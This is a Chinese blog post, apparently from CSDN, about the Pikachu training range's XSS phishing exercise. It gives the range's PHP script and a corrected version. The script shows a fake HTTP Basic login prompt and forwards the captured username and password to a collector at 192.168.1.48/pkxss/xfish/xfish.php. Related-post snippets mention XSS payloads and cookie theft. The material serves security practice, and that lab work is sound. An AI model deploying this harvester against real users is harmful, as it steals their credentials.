pikachu靶场的钓鱼问题整不明白了,只好改一下这个文件,后台就是收不到请求

于 2024-06-11 15:56:00 发布
阅读量390 收藏 8
点赞数 4
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29078869/article/details/139601389
版权

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
    header("Location: http://192.168.1.48/pikachu/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
    &password={$_SERVER[PHP_AUTH_PW]}");
}

?>

修正后的代码如下所示:

```php
<?php
error_reporting(0);

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW'])) {
    // 发送认证框,并给出迷惑性的 info
    header('Content-type: text/html; charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} elseif (isset($_SERVER['PHP_AUTH_USER']) && isset($_SERVER['PHP_AUTH_PW'])) {
    // 将结果发送给搜集信息的后台, 请将这里的 IP 地址修改为管理后台的 IP
    $username = $_SERVER['PHP_AUTH_USER'];
    $password = $_SERVER['PHP_AUTH_PW'];
    $encodedUsername = urlencode($username);
    $encodedPassword = urlencode($password);
    header("Location: http://192.168.1.48/pkxss/xfish/xfish.php?username=$encodedUsername&password=$encodedPassword");
}
?>
```

改完之后后台能收到,存储型XSS的漏洞的账号密码了

qq_29078869
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu平台之xss漏洞
qq_42728977的博客
12-16 3061
反射型xss(get) 原理 传递的参数直接存在页面代码中,而且没有过滤 流程 打开页面 发现有长度限制,F12进行修 。 输入特殊字符,检查是否有过滤 发现并没有过滤,而且直接在页面代码中了 存在xss漏洞,尝试输入<script>alert(xss)</script>,发现有长度限制,用F12修后。 反射型xss(post) ...
pikachu漏洞靶机之xss漏洞xss钓鱼
weixin_43803070的博客
06-01 2802
跨站脚本漏洞测试流程 ① 在目标站点上找到输入点,比如查询接口,留言板等; ② 输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理; ③ 通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合); ④ 提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞; TIPS: 1.一般查询接口容易出现反射...
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 7947
前端js代码限制输入框只能提交20个字段,将它修为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
【记一次踩坑:pikachu靶场钓鱼无法获取cookie】
weixin_38541179的博客
11-26 492
标红处少了单引号,然后完美获取到了,对照下图才发现的不清楚是我下载的靶场是不是有问题,还是太菜了,一下竟然没发现。折腾了好久。
pikachu存储型XSS钓鱼攻击后台收不到数据的原因!
qq_63526803的博客
04-23 1165
XSS钓鱼攻击后台获取不到数据的原因。
社会工程学实验-一次非正式钓鱼的测试(靶场演示)
易编橙 · 终身成长社群,相遇已是上上签!
12-19 1318
文章目录社会工程学实验-一次非正式钓鱼的测试SET中渗透测试的攻击向量SET中的第三方模块社会工程学攻击 社会工程学实验-一次非正式钓鱼的测试 关于SET:Social-engineering toolkit的缩写,社会工程学工具集。里面包含了许多用于进行社会工程学攻击的工具。 社会工程学 社会工程学通常以交谈、欺骗、假冒或口语等方式,从合法用户中套取用户系统的秘密。熟练的社会工程师都是擅长进行信息收集的身体力行者。很多表面上看起来一点用都没有的信息都会被这些人利用起来进行渗透。比如说一个电话号码,一个人的
pikachu漏洞靶机之暴力破解漏洞
weixin_43803070的博客
06-01 1582
暴力破解漏洞: 前言: 破解流程: 我们首先抓包,随便入如一个账号、密码,发送到破解板块。 sniper破解方式只会一个一个去破解你需要破解的变量,比如需要破解一个password和uesrname,他只会单独破解pa或者单独破解us。 Battering ram选项,他能够把我们所选的所有变量,同时进行破解。(具有一致性),把所有变量进行全部替换。 Pitchfork这个选项,他会对我们所选择...
搭建Pikachu靶场出现的问题
热门推荐
weixin_48584917的博客
05-27 1万+
在Windows搭建pikachu出现的两个问题,今天带大家来解决一下 ①PHPstudy(小皮面板)出现80端口被占用 ②Pikachu出现数据连接失败,请仔细检查inc/config.inc.php的配置的问题 准备的工具:Everything ①: 当初启动Apache服务时会出现端口80被占用,此时最好是修端口号 使用Everything搜索:httpd.conf 打开路径短一点的那个文件,也就是路径*\Apache2.4.39\conf 现在使用记事本打开或者Nodepad++ 按Ctrl
[ pikachu ] 靶场通关之 XSS (一) --- 概述
qq_51577576的博客
11-18 1655
暴力破解的字典 链接:https://pan.baidu.com/s/1Tr7ONqDGA0u5kMOfN6oR1A 提取码:qvo2 XSS (跨站脚本)概述 目录 XSS (跨站脚本)概述 跨站脚本漏洞攻击流程:​ 跨站脚本漏洞盗取cookie流程: 跨站脚本漏洞的常见类型: 三种类型的区别: 形成原因: XXS防御: 跨站脚本漏洞(xxs)漏洞的测试流程 利用方式: 钓鱼攻击: 跨站脚本漏洞盗取cookie攻击流程: 什么是xss盲打 什么是跨域 同源策略 ...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8417
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
08-25
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描述您的求职意
JAVA版基于netty的物联网高并发智能网关
最新发布
08-25
JAVA版基于netty的物联网高并发智能网关
pikachu靶场文件包含
10-20
pikachu靶场是一个适用于新手学习WEB安全时练习使用的开源靶场,其中包含了文件包含漏洞。文件包含漏洞是指在程序中使用了用户可控的文件名或路径,攻击者可以通过构造特定的文件名或路径来读取或执行任意文件,从而实现攻击。在pikachu靶场中,你可以通过模拟攻击来学习如何发现和利用文件包含漏洞,以及如何防范这种漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值